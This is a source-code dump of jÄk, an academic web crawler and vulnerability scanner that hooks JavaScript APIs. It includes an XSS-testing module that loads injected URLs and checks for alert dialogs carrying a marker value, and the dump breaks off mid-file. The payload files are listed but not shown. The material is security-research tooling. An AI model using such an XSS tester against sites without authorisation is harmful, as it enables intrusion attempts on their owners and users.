├── .gitignore
├── LICENSE.txt
├── README.md
└── crawler
    ├── analyzer
        ├── __init__.py
        ├── helper
        │   ├── __init__.py
        │   ├── formhelper.py
        │   ├── linkhelper.py
        │   └── propertyhelper.py
        └── mainanalyzer.py
    ├── attack
        ├── __init__.py
        ├── xss.py
        ├── xssvectors.txt
        └── xxxattacks.py
    ├── attacker.py
    ├── core
        ├── __init__.py
        ├── clustermanager.py
        ├── eventexecutor.py
        ├── formhandler.py
        ├── interactioncore.py
        ├── jaekcore.py
        └── jsbridge.py
    ├── crawler.py
    ├── database
        ├── __init__.py
        ├── database.py
        └── databasemanager.py
    ├── example.py
    ├── experiments_paper.py
    ├── js
        ├── addeventlistener_wrapper.js
        ├── ajax_interceptor.js
        ├── ajax_observer.js
        ├── lib.js
        ├── md5.js
        ├── property_obs.js
        └── timing_wrapper.js
    ├── main.py
    ├── models
        ├── __init__.py
        ├── ajaxrequest.py
        ├── asyncrequests.py
        ├── asyncrequeststructure.py
        ├── clickable.py
        ├── clickabletype.py
        ├── deltapage.py
        ├── enumerations.py
        ├── form.py
        ├── keyclickable.py
        ├── link.py
        ├── parametertype.py
        ├── timingrequest.py
        ├── url.py
        ├── urlstructure.py
        ├── utils.py
        └── webpage.py
    ├── network
        ├── __init__.py
        └── network.py
    ├── tests
        ├── __init__.py
        ├── databasetest.py
        └── domainhandlertest.py
    └── utils
        ├── __init__.py
        ├── asyncrequesthandler.py
        ├── config.py
        ├── domainhandler.py
        ├── execptions.py
        ├── requestor.py
        ├── user.py
        └── utils.py


/.gitignore:
--------------------------------------------------------------------------------
  1 | # Byte-compiled / optimized / DLL files
  2 | __pycache__/
  3 | *.py[cod]
  4 | 
  5 | # C extensions
  6 | *.so
  7 | 
  8 | # Distribution / packaging
  9 | .Python
 10 | env/
 11 | build/
 12 | develop-eggs/
 13 | dist/
 14 | downloads/
 15 | eggs/
 16 | lib/
 17 | lib64/
 18 | parts/
 19 | sdist/
 20 | var/
 21 | *.egg-info/
 22 | .installed.cfg
 23 | *.egg
 24 | .webkit-cache/
 25 | 
 26 | # PyInstaller
 27 | #  Usually these files are written by a python script from a template
 28 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
 29 | *.manifest
 30 | *.spec
 31 | 
 32 | # Installer logs
 33 | pip-log.txt
 34 | pip-delete-this-directory.txt
 35 | 
 36 | # Unit test / coverage reports
 37 | htmlcov/
 38 | .tox/
 39 | .coverage
 40 | .cache
 41 | nosetests.xml
 42 | coverage.xml
 43 | 
 44 | # Translations
 45 | *.mo
 46 | *.pot
 47 | 
 48 | # Django stuff:
 49 | *.log
 50 | 
 51 | # Sphinx documentation
 52 | docs/_build/
 53 | 
 54 | # PyBuilder
 55 | target/
 56 | 
 57 | # Latex
 58 | 
 59 | *.aux
 60 | *.glo
 61 | *.idx
 62 | *.log
 63 | *.toc
 64 | *.ist
 65 | *.acn
 66 | *.acr
 67 | *.alg
 68 | *.bbl
 69 | *.blg
 70 | *.dvi
 71 | *.glg
 72 | *.gls
 73 | *.ilg
 74 | *.ind
 75 | *.lof
 76 | *.lot
 77 | *.maf
 78 | *.mtc
 79 | *.mtc1
 80 | *.out
 81 | *.synctex.gz
 82 | 
 83 | # Eclipse
 84 | 
 85 | *.pydevproject
 86 | .metadata
 87 | .gradle
 88 | bin/
 89 | tmp/
 90 | *.tmp
 91 | *.bak
 92 | *.swp
 93 | *~.nib
 94 | local.properties
 95 | .settings/
 96 | .loadpath
 97 | 
 98 | # External tool builders
 99 | .externalToolBuilders/
100 | 
101 | # Locally stored "Eclipse launch configurations"
102 | *.launch
103 | 
104 | # CDT-specific
105 | .cproject
106 | 
107 | # PDT-specific
108 | .buildpath
109 | 
110 | # sbteclipse plugin 
111 | .target
112 | 
113 | # TeXlipse plugin
114 | .texlipse
115 | 
116 | crawler/similarities/
117 | crawler/result/
118 | crawler/database/databaselegacy.py
119 | 
120 | main2.py
121 | 
122 | .idea/
123 | .project
124 | 
125 | README
126 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # jÄk - jet Änother krawler.
 2 | 
 3 | jÄk (or jAEk, pron. Jack) is a web application crawler and scanner which uses dynamic JavaScript code analysis. jÄk installs hooks in JavaScript APIs in order to detect the registration of event handlers, the use of network communication APIs, and dynamically-generated URLs or user forms. It then builds and mantains a navigation graph to crawl and test web applications. For more details on the internals please have a look at [my thesis and our paper](#papers-and-further-readings)
 4 | 
 5 | ## Requirements
 6 | 
 7 | jÄk is written in python (version 3) and it is based on [PyQT5](https://riverbankcomputing.com/software/pyqt/intro) (version 5.3 - 5.4). To store data, jÄk uses mongodb via the [pymongo](https://api.mongodb.org/python/current/) 3.x.x bindings. Please, install the required packaged using pip, the packages manager of your distribution, or follow the documentation. jÄk also requires [cython](http://cython.org/).
 8 | 
 9 | ## Running jÄk
10 | 
11 | The current version of jÄk does not offer a command-line interface. To run jÄk, you will have to write some python code and get familiar with jÄk classes and libraries. The entry point to start using jÄk is [crawler/example.py](https://github.com/ConstantinT/jAEk/blob/master/crawler/example.py). 
12 | 
13 | ### 1. Configuration Objects
14 | 
15 | #### 1.1 Users
16 | jÄk can use user credential and perform user login. The URL of the login page and the credential can be configured via the object `utils.user.User`. For example:
17 | 
18 | ```
19 | user = User("Wordpress", 0, "http://localhost:8080/wp-login.php", login_data = {"log": "admin", "pwd": "admin"}, session="1")
20 | ```
21 | Parameters:
22 |   1. Name of the MongoDB database name (it can be an arbitrary name)
23 |   2. (Deprecated) Privilege Level of the User (0 is ok)
24 |   3. URL of the login page with the HTML form
25 |   4. Login data for the user login, e.g., `log` and `pwd` are the form input field names 
26 |   5. If you want to use the credentials in parallel runs of jÄk with the same database, set >1
27 | 
28 | #### 1.2 Crawler and Attacker Configuration
29 | 
30 | ```
31 | url = "http://localhost/
32 | [...]
33 | crawler_config = CrawlConfig("jÄk", url, max_depth=3, max_click_depth=3, crawl_speed=CrawlSpeed.Fast)
34 | attack_config = AttackConfig(url)
35 | ```
36 | 
37 | where:
38 | * `max_depth` is the maximum depth of the web application link tree;
39 | * `max_click_depth` is the maximum depth of click event that are fired;
40 | * `crawl_speed` specifies the time that the crawler waits after it loads a page or triggered an event. These are the possible values:
41 |  * CrawlSpeed.Slow:
42 |    * wait after loading: 1 sec.
43 |     * wait after event: 2 sec.
44 |  * CrawlSpeed.Medium:
45 |    * wait after loading: 0.3 sec.
46 |     * wait after event: 1 sec.
47 |  * CrawlSpeed.Fast:
48 |    * wait after loading: 0.1 sec.
49 |     * wait after event: 0.5 sec.
50 |  * CrawlSpeed.Speed_of_Lightning:
51 |    * wait after loading: 0.01 sec.
52 |     * wait after event: 0.1 sec.
53 | 
54 | #### 1.3 Database
55 | 
56 | ```
57 | database_manager = DatabaseManager(user, dropping=True)
58 | ```
59 | 
60 | `user` is also an instance of the `User` class.
61 | 
62 | ### 2 Setting up the Crawler
63 | 
64 | To run the crawler use:
65 | 
66 | ```
67 | crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager)
68 | crawler.crawl(user)
69 | ```
70 | 
71 | You can also setup an HTTP proxy between the crawler and the web application (e.g., localhost:8082):
72 | 
73 | ```
74 | crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager, proxy="localhost", port=8082)
75 | crawler.crawl(user)
76 | ```
77 | 
78 | ## Papers and further readings
79 | 
80 | * C. Tschürtz. *Improving Crawling with JavaScript Function Hooking* [DE: Verbesserung von Webcrawling durch JavaScript Funktion Hooking].
81 | * G. Pellegrino, C. Tschürtz, E. Bodden, and C. Rossow. *jÄk: Using Dynamic Analysis to Crawl and Test Modern Web Applications*. Proceedings of Research in Attacks, Intrusions and Defenses (RAID) Symposium (RAID 2015). [PDF](http://trouge.net/papers/jAEk_raid2015.pdf)
82 | 
83 | ## Contacts
84 | 
85 | * C. Tschürtz *[constantin dot tschuertz (at) gmail dot com]*
86 | * G. Pellegrino *[gpellegrino (at) cispa dot saarland]*
87 | 
88 | ## License
89 | 
90 | See jÄk is released as General Public License version 3 or later (See L[ICENSE.txt](https://github.com/ConstantinT/jAEk/blob/master/LICENSE.txt)).
91 | 


--------------------------------------------------------------------------------
/crawler/analyzer/__init__.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | 


--------------------------------------------------------------------------------
/crawler/analyzer/helper/__init__.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''


--------------------------------------------------------------------------------
/crawler/analyzer/helper/formhelper.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | import logging
19 | from models.form import HtmlForm, FormInput
20 | 
21 | def extract_forms(frame):
22 |     result = []
23 |     forms = frame.findAllElements("form")
24 |     for form in forms:
25 |         action = form.attribute("action")
26 |         method = form.attribute("method") if form.attribute("method") == "post" else "get"
27 |         dom_address = form.evaluateJavaScript("getXPath(this)")
28 |         form_params = _extracting_information(form)
29 |         result.append(HtmlForm(form_params, action, method, dom_address))
30 |     return result
31 | 
32 | def _extracting_information(elem):
33 |     result = []
34 |     inputs = elem.findAll("input")
35 |     radio_buttons = {} # key = name, value = array mit values
36 | 
37 |     for input_el in inputs:
38 |         tag_name = input_el.tagName()
39 |         if input_el.hasAttribute("type"):
40 |             input_type = input_el.attribute("type")
41 |             if input_type != "radio": #no radio button
42 |                 if input_el.hasAttribute("name") or input_type == "submit":
43 |                     name = input_el.attribute("name")
44 |                 else:
45 |                     continue #A input-element without name has no impact, why waste memory? Ok jaek you are alright, if it is a submit element we need it...
46 |                 if input_el.hasAttribute("value"):
47 |                     value = [input_el.attribute("value")]
48 |                 else:
49 |                     value = [None]
50 |                 result.append(FormInput(tag_name, name, input_type, value))
51 |             else: # input is radiobutton
52 |                 name = input_el.attribute("name")
53 |                 if name in radio_buttons: # Radio-Button name exists
54 |                     radio_buttons[name].append(input_el.attribute("value"))
55 |                 else: #Radiobutton name exists not
56 |                     radio_buttons[name] = []
57 |                     radio_buttons[name].append(input_el.attribute("value"))
58 |         else:
59 |             if input_el.hasAttribute("name"):
60 |                 name = input_el.attribute("name")
61 |                 tag_name = input_el.tagName()
62 |                 result.append(FormInput(tag_name, name, None, None))
63 |     for key in radio_buttons:
64 |         result.append(FormInput(tag_name, key, input_type, radio_buttons[key]))
65 |     buttons = elem.findAll("button")
66 |     for button in buttons:
67 |         tag_name = button.tagName()
68 |         if button.hasAttribute("type"):
69 |             button_type = button.attribute("type")
70 |         else:
71 |             button_type = None
72 |         if button.hasAttribute("name"):
73 |             name = button.attribute("name")
74 |         else:
75 |             name = None
76 |         if button.hasAttribute("value"):
77 |             value = [button.attribute("value")]
78 |         else:
79 |             value = None
80 |         result.append(FormInput(tag_name, name, button_type, value))
81 | 
82 |     selects = elem.findAll("select")#<select> <option>
83 |     for select in selects:
84 |         select_name = select.attribute("name")
85 |         options = select.findAll("option")
86 |         values = []
87 |         for option in options:
88 |             values.append(option.attribute("value"))
89 |         f_input = FormInput(select.tagName(), select_name, None, values)
90 |         result.append(f_input)
91 |     return result


--------------------------------------------------------------------------------
/crawler/analyzer/helper/linkhelper.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | import logging
19 | from models.clickable import Clickable
20 | from models.link import Link
21 | from models.url import Url
22 | from urllib.parse import urlparse, urljoin
23 | 
24 | def extract_links(frame, requested_url):
25 |     try:
26 |         requested_url = requested_url.toString()
27 |     except AttributeError:
28 |         requested_url = requested_url
29 |     anchor_tags = frame.findAllElements("a")
30 |     new_links, new_clickables = _extract_new_links_from_links(anchor_tags, requested_url)
31 |     iframes = frame.findAllElements("iframe") + frame.findAllElements("frame")
32 |     new_links = new_links + extract_links_from_iframe(iframes)
33 |     return new_links, new_clickables
34 | 
35 | def _extract_new_links_from_links(elements, requested_url):
36 |     found_links = []
37 |     new_clickables = []
38 |     if(len(elements) == 0):
39 |         #logging.debug("No links found...")
40 |         return [], []
41 |     else:
42 |         for elem in elements:
43 |             href = elem.attribute("href")
44 |             #logging.debug(str(type(elem)) + " href: " + str(href) + " Tagname: " + str(elem.tagName()))
45 |             if href == "/" or href == requested_url or href == "": #or href[0] == '#':
46 |                 continue
47 |             elif "javascript:" in href: #We assume it as clickable
48 |                 html_id = elem.attribute("id")
49 |                 html_class = elem.attribute("class")
50 |                 dom_address = elem.evaluateJavaScript("getXPath(this)")
51 |                 event = href
52 |                 tag = "a"
53 |                 new_clickables.append(Clickable(event, tag, dom_address, html_id, html_class, None, None))
54 |             elif "#" in href:
55 |                 html_id = elem.attribute("id")
56 |                 html_class = elem.attribute("class")
57 |                 dom_address = elem.evaluateJavaScript("getXPath(this)")
58 |                 event = "click"
59 |                 tag = "a"
60 |                 new_clickables.append(Clickable(event, tag, dom_address, html_id, html_class, None, None))
61 |             elif len(href) > 0:
62 |                 html_id = elem.attribute("id")
63 |                 html_class = elem.attribute("class")
64 |                 dom_address = elem.evaluateJavaScript("getXPath(this)")
65 |                 url = href
66 |                 link = Link(url, dom_address, html_id, html_class)
67 |                 found_links.append(link)
68 |             else:
69 |                 logging.debug("Elem has attribute href: " + str(elem.attribute("href") + " and matches no criteria"))
70 |     return found_links, new_clickables
71 | 
72 | def extract_links_from_iframe(elements):
73 |     found_links = []
74 |     if len(elements) == 0:
75 |         return []
76 |     for element in elements:
77 |         src = element.attribute("src")
78 |         html_id = element.attribute("id")
79 |         html_class = element.attribute("class")
80 |         dom_address = element.evaluateJavaScript("getXPath(this)")
81 |         link = Link(src, dom_address, html_id, html_class)
82 |         found_links.append(link)
83 |     return found_links


--------------------------------------------------------------------------------
/crawler/analyzer/helper/propertyhelper.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | import logging
19 | from models.clickable import Clickable
20 | 
21 | __author__ = 'constantin'
22 | 
23 | 
24 | def property_helper(frame):
25 |     all_elements = frame.findAllElements("*")
26 |     result = []
27 |     properties = ['onclick', "onmouseover", "onabort", "onblur", "onchange", "onblclick", "onerror", "onfocus", "onkeydown",
28 |                   "onkeypress", "onkeyup", "onmousedown", "onmousemove", "onmouseout", "onmouseup"]
29 |     for element in all_elements:
30 |         element_id = None
31 |         element_class = None
32 |         if element.hasAttribute("id"):
33 |             element_id = element.attribute("id")
34 |         if element.hasAttribute("class"):
35 |             element_class = element.attribute("class")
36 |         element_dom_address = None
37 |         for prop in properties:
38 |             if element.hasAttribute(prop):
39 |                 if element_dom_address is None:
40 |                     element_dom_address = element.evaluateJavaScript("getXPath(this)")
41 |                 result.append(Clickable(prop, element.tagName(), element_dom_address, element_id, element_class, function_id="None"))
42 |     return result


--------------------------------------------------------------------------------
/crawler/analyzer/mainanalyzer.py:
--------------------------------------------------------------------------------
  1 | '''
  2 | Copyright (C) 2015 Constantin Tschuertz
  3 | 
  4 | This program is free software: you can redistribute it and/or modify
  5 | it under the terms of the GNU General Public License as published by
  6 | the Free Software Foundation, either version 3 of the License, or
  7 | any later version.
  8 | 
  9 | This program is distributed in the hope that it will be useful,
 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 12 | GNU General Public License for more details.
 13 | 
 14 | You should have received a copy of the GNU General Public License
 15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
 16 | '''
 17 | 
 18 | import logging
 19 | 
 20 | from PyQt5.QtCore import QByteArray
 21 | from PyQt5.QtNetwork import QNetworkRequest, QNetworkAccessManager
 22 | from PyQt5.Qt import QUrl
 23 | from analyzer.helper.propertyhelper import property_helper
 24 | 
 25 | from core.interactioncore import InteractionCore
 26 | from analyzer.helper.formhelper import extract_forms
 27 | from analyzer.helper.linkhelper import extract_links
 28 | from models.timingrequest import TimingRequest
 29 | from models.utils import CrawlSpeed, purge_dublicates
 30 | 
 31 | from models.clickable import Clickable
 32 | from models.webpage import WebPage
 33 | 
 34 | 
 35 | class MainAnalyzer(InteractionCore):
 36 |     def __init__(self, parent, proxy="", port=0, crawl_speed=CrawlSpeed.Medium, network_access_manager=None):
 37 |         super(MainAnalyzer, self).__init__(parent, proxy, port, crawl_speed, network_access_manager)
 38 |         self._loading_complete = False
 39 |         self._analyzing_finished = False
 40 |         self._timing_requests = []
 41 |         self._new_clickables = []
 42 |         self._timeming_events = []
 43 |         self._current_timeming_event = None
 44 |         self.response_code = {}
 45 | 
 46 |     def analyze(self, url_to_request, timeout=10, current_depth=None, method="GET", data={}):
 47 |         try:
 48 |             url_to_request = url_to_request.toString()
 49 |         except AttributeError:
 50 |             url_to_request = url_to_request
 51 | 
 52 |         logging.debug("Start analyzing the url {}...".format(url_to_request))
 53 |         self._timing_requests = []
 54 |         self._new_clickables = []
 55 |         self._timeming_events = []
 56 |         self._current_timeming_event = None
 57 |         self._loading_complete = False
 58 |         self._analyzing_finished = False
 59 |         self.response_code = {}
 60 |         if method == "GET":
 61 |             self.mainFrame().load(QUrl(url_to_request))
 62 |         else:
 63 |             request = self.make_request(url_to_request)
 64 |             data = self.post_data_to_array(data)
 65 |             request.setRawHeader('Content-Type', QByteArray('application/x-www-form-urlencoded'))
 66 |             self.mainFrame().load(request,
 67 |                                   QNetworkAccessManager.PostOperation,
 68 |                                   data)
 69 |         t = 0
 70 |         while (not self._loading_complete and t < timeout ):  # Waiting for finish processing
 71 |             self._wait(self.wait_for_processing)
 72 |             t += self.wait_for_processing
 73 | 
 74 |         videos = self.mainFrame().findAllElements("video")
 75 |         if len(videos) > 0:
 76 |             logging.debug("{} videos found... removing them")
 77 |             for video in videos:
 78 |                 video.removeFromDocument()
 79 | 
 80 |         overall_waiting_time = t
 81 |         buffer = 250
 82 |         while len(self._timeming_events) > 0 and overall_waiting_time < timeout:
 83 |             self._current_timeming_event = self._timeming_events.pop(0)  # Take the first event(ordered by needed time
 84 |             self._waiting_for = self._current_timeming_event['event_type']  # Setting kind of event
 85 |             waiting_time_in_milliseconds = (self._current_timeming_event[
 86 |                                                 "time"] - overall_waiting_time)  # Taking waiting time and convert it from milliseconds to seconds
 87 |             waiting_time_in_milliseconds = ((waiting_time_in_milliseconds + buffer) / 1000.0)
 88 |             if waiting_time_in_milliseconds < 0.0:
 89 |                 waiting_time_in_milliseconds = 0
 90 |             self._wait(waiting_time_in_milliseconds)  # Waiting for 100 millisecond before expected event
 91 |             overall_waiting_time += waiting_time_in_milliseconds
 92 |         if overall_waiting_time < 0.5:
 93 |             self._wait((0.5 - overall_waiting_time))
 94 | 
 95 |         # Just for debugging
 96 |         #f = open("text.txt", "w")
 97 |         #f.write(self.mainFrame().toHtml())
 98 |         #f.close()
 99 |         base_url = self.mainFrame().findFirstElement("base")
100 |         if base_url is not None:
101 |             base_url = base_url.attribute("href")
102 | 
103 |         links, clickables = extract_links(self.mainFrame(), url_to_request)
104 |         forms = extract_forms(self.mainFrame())
105 |         elements_with_event_properties = property_helper(self.mainFrame())
106 |         self.mainFrame().evaluateJavaScript(self._property_obs_js)
107 |         self._wait(0.1)
108 | 
109 |         self._analyzing_finished = True
110 |         html_after_timeouts = self.mainFrame().toHtml()
111 |         response_url = self.mainFrame().url().toString()
112 | 
113 |         self.mainFrame().setHtml(None)
114 |         self._new_clickables.extend(clickables)
115 |         self._new_clickables.extend(elements_with_event_properties)
116 |         self._new_clickables = purge_dublicates(self._new_clickables)
117 |         response_code = None
118 |         try:
119 |             response_code = self.response_code[url_to_request]
120 |         except KeyError:
121 |             response_code = 200
122 |         if response_code is None:
123 |             response_code = 200
124 |         try:
125 |             current_page = WebPage(self.parent().get_next_page_id(), response_url, html_after_timeouts)
126 |         except AttributeError: #Attacker don't need this function...
127 |             current_page = WebPage(42, response_url, html_after_timeouts)
128 |         current_page.timing_requests = self._timing_requests
129 |         current_page.clickables = self._new_clickables
130 |         current_page.links = links
131 |         current_page.forms = forms
132 |         if base_url is not None and base_url != "":
133 |             current_page.base_url = base_url
134 |         return response_code, current_page
135 | 
136 |     def loadFinishedHandler(self, result):
137 |         if not self._analyzing_finished:  # Just to ignoring setting of non page....
138 |             self._loading_complete = True
139 | 
140 |     def jsWinObjClearedHandler(self):  # Adding here the js-scripts I need
141 |         if not self._analyzing_finished:
142 |             self.mainFrame().addToJavaScriptWindowObject("jswrapper", self._js_bridge)
143 |             self.mainFrame().evaluateJavaScript(self._md5)
144 |             self.mainFrame().evaluateJavaScript(self._lib_js)
145 |             self.mainFrame().evaluateJavaScript(self._timeming_wrapper_js)
146 |             self.mainFrame().evaluateJavaScript(self._xhr_observe_js)
147 |             self.mainFrame().evaluateJavaScript(self._addEventListener)
148 | 
149 |     def capturing_requests(self, request):
150 |         # logging.debug("Event captured..." + str(request))
151 |         try:
152 |             params = request["parameters"]
153 |         except KeyError:
154 |             params = None
155 |         try:
156 |             timeming_request = TimingRequest(request['method'], request['url'], self._current_timeming_event["time"],
157 |                                              self._current_timeming_event["event_type"], params)
158 |             self._timing_requests.append(timeming_request)
159 |         except TypeError:
160 |             timeming_request = TimingRequest(request['method'], request['url'], None, None, params)
161 |             self._timing_requests.append(timeming_request)
162 | 
163 |     def capture_timeout_call(self, timingevent):
164 |         try:
165 |             if timingevent['time'] != "undefined":
166 |                 time = timingevent['time']  # millisecond
167 |                 event_type = timingevent['type']
168 |                 event_id = timingevent['function_id']
169 |                 timeming_event = {"time": time, "event_type": event_type, "event_id": event_id}
170 |                 self._timeming_events.append(timeming_event)
171 |                 self._timeming_events = sorted(self._timeming_events, key=lambda e: e['time'])  # Sort list
172 |         except KeyError:
173 |             pass
174 | 
175 |     def frameCreatedHandler(self, frame):
176 |         logging.debug("Frame created")
177 | 
178 |     def javaScriptConsoleMessage(self, message, lineNumber, sourceID):
179 |         logging.debug("Console(DynamicAnalyzer): " + message + " at: " + str(lineNumber) + " from: " + sourceID)
180 |         pass
181 | 
182 |     def loadComplete(self, reply):
183 |         if not self._analyzing_finished:
184 |             #sometimes the response code is none, but in reality it is valid
185 |             if reply.attribute(QNetworkRequest.HttpStatusCodeAttribute) is None:
186 |                 return
187 |             self.response_code[reply.url().toString()] = reply.attribute(QNetworkRequest.HttpStatusCodeAttribute)
188 | 
189 |     def javaScriptAlert(self, frame, msg):
190 |         logging.debug("Alert occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg))


--------------------------------------------------------------------------------
/crawler/attack/__init__.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''


--------------------------------------------------------------------------------
/crawler/attack/xss.py:
--------------------------------------------------------------------------------
  1 | '''
  2 | Copyright (C) 2015 Constantin Tschuertz
  3 | 
  4 | This program is free software: you can redistribute it and/or modify
  5 | it under the terms of the GNU General Public License as published by
  6 | the Free Software Foundation, either version 3 of the License, or
  7 | any later version.
  8 | 
  9 | This program is distributed in the hope that it will be useful,
 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 12 | GNU General Public License for more details.
 13 | 
 14 | You should have received a copy of the GNU General Public License
 15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
 16 | '''
 17 | 
 18 | from enum import Enum
 19 | import logging
 20 | from PyQt5.QtCore import QUrl
 21 | from PyQt5.QtNetwork import QNetworkRequest
 22 | from core.interactioncore import InteractionCore
 23 | from models.utils import CrawlSpeed
 24 | 
 25 | __author__ = 'constantin'
 26 | 
 27 | 
 28 | class XSSAttacker(InteractionCore):
 29 | 
 30 |     def __init__(self, parent, proxy = "", port = 0, crawl_speed = CrawlSpeed.Medium, network_access_manager = None):
 31 |         super(XSSAttacker, self).__init__(parent, proxy, port, crawl_speed, network_access_manager)
 32 |         self._analyzing_finished = False
 33 |         self._loading_complete = False
 34 |         self._attack_successfull = False
 35 |         self._random_value = None
 36 |         self.response_code = {}
 37 |         self.content_type = {}
 38 |         self.attack_counter = 0
 39 | 
 40 |     def attack(self, url, random_value, timeout = 10, verbose= False):
 41 |         self._analyzing_finished = False
 42 |         self._loading_complete = False
 43 |         self._attack_successfull = False
 44 |         self._random_value = random_value
 45 |         self.content_type = {}
 46 |         self.response_code = {}
 47 |         self.networkAccessManager().finished.connect(self.load_complete)
 48 |         self.mainFrame().load(QUrl(url))
 49 | 
 50 |         t = 0
 51 |         while not self._loading_complete and t < timeout:
 52 |             self._wait(self.wait_for_processing)
 53 |             t += self.wait_for_processing
 54 | 
 55 |         if not self._loading_complete:
 56 |             logging.debug("Timeout Error occurs...")
 57 |             self._analyzing_finished = True
 58 |             self.mainFrame().setHtml(None)
 59 |             return AttackResult.ErrorTimeout, None
 60 |         self.attack_counter += 1
 61 |         response_url = self.mainFrame().url().toString()
 62 |         try:
 63 |             response_code = self.response_code[response_url]
 64 |         except KeyError:
 65 |             response_code = 200
 66 |         response_html = self.mainFrame().toHtml()
 67 |         try:
 68 |             content_type = self.content_type[response_url]
 69 |         except KeyError:
 70 |             content_type = ""
 71 | 
 72 |         if verbose:
 73 |             self._analyzing_finished = True
 74 |             f = open("attackresult/" + str(self.attack_counter), "w")
 75 |             f.write("Url: " + url + " \n")
 76 |             f.write("================================================== \n")
 77 |             f.write(response_html)
 78 |             f.write(" \n =============================================== \n")
 79 | 
 80 |         self.networkAccessManager().finished.disconnect(self.load_complete)
 81 |         self.mainFrame().setHtml(None)
 82 | 
 83 |         if self._attack_successfull:
 84 |             if verbose:
 85 |                 f.write(" \n Success!!!! \n")
 86 |                 f.close()
 87 |             return AttackResult.AttackSuccessfull, response_code
 88 |         else:
 89 |             if verbose:
 90 |                 f.write(" \n Fail... \n")
 91 |                 f.close()
 92 |             try:
 93 |                 if response_html is None:
 94 |                     return AttackResult.NotFound, response_code
 95 |                 if random_value not in response_html and "javascript" in content_type:
 96 |                     return AttackResult.JSON, response_code
 97 |                 elif random_value not in response_html and "html" in content_type:
 98 |                     return AttackResult.NotFound, response_code
 99 |                 else:
100 |                     return AttackResult.AttackFailed, response_code
101 |             except TypeError:
102 |                 print("Error in {}, Random value: {}, Content Type: {}".format(url, random_value, content_type))
103 | 
104 |     def loadFinishedHandler(self, result):
105 |         if not self._analyzing_finished:  # Just to ignoring setting of non page....
106 |             self._loading_complete = True
107 | 
108 | 
109 |     def javaScriptAlert(self, frame, msg):
110 |         logging.debug("Alert occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg))
111 |         if self._random_value in msg:
112 |             self._attack_successfull = True
113 | 
114 |     def _url_changes(self, url):
115 |         self._url_changed = True
116 |         self._new_url = url
117 | 
118 |     def load_complete(self, reply):
